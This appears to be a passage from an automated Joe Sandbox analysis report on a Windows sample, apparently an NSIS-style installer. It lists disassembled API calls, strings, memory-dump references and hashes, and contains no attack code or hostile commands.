                                                                                                                • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                                • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                  • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                • API String ID: 1975747703-1425696872
                                                                                                                • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                                • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                                • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                                • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                • GetDlgItem.USER32(?,?), ref: 004045D0
                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                • GetDlgItem.USER32(?,?), ref: 004046CC
                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 0040477D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                • String ID: N
                                                                                                                • API String ID: 3103080414-1130791706
                                                                                                                • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                                • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                  • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,?,00404A0C), ref: 00405A45
                                                                                                                  • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                                  • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                                  • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                                  • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                  • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                  • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                  • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: (7B$A
                                                                                                                • API String ID: 2624150263-3645020878
                                                                                                                • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                                • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                                • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                  • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                  • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                • wsprintfA.USER32 ref: 004060B3
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                  • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                  • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                                • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                                • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,?), ref: 00402F60
                                                                                                                  • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                  • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                                • GlobalAlloc.KERNEL32(?,0040A230), ref: 004030F0
                                                                                                                Strings
                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                • soft, xrefs: 00403020
                                                                                                                • Error launching installer, xrefs: 00402F80
                                                                                                                • Null, xrefs: 00403029
                                                                                                                • Inst, xrefs: 00403017
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 2803837635-787788815
                                                                                                                • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                                • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                                • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(004281E0,?), ref: 0040654B
                                                                                                                • GetWindowsDirectoryW.KERNEL32(004281E0,?,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                Strings
                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 717251189-730719616
                                                                                                                • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                                • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                                • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                                • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                APIs
                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                                                                                  • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                • String ID: 9
                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                                • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                                • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                                • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                                • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                                • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                • wsprintfW.USER32 ref: 00402EF5
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                  • Part of subcall function 00402E72: MulDiv.KERNEL32(?,?,?), ref: 00402E87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                • String ID: ... %d%%
                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
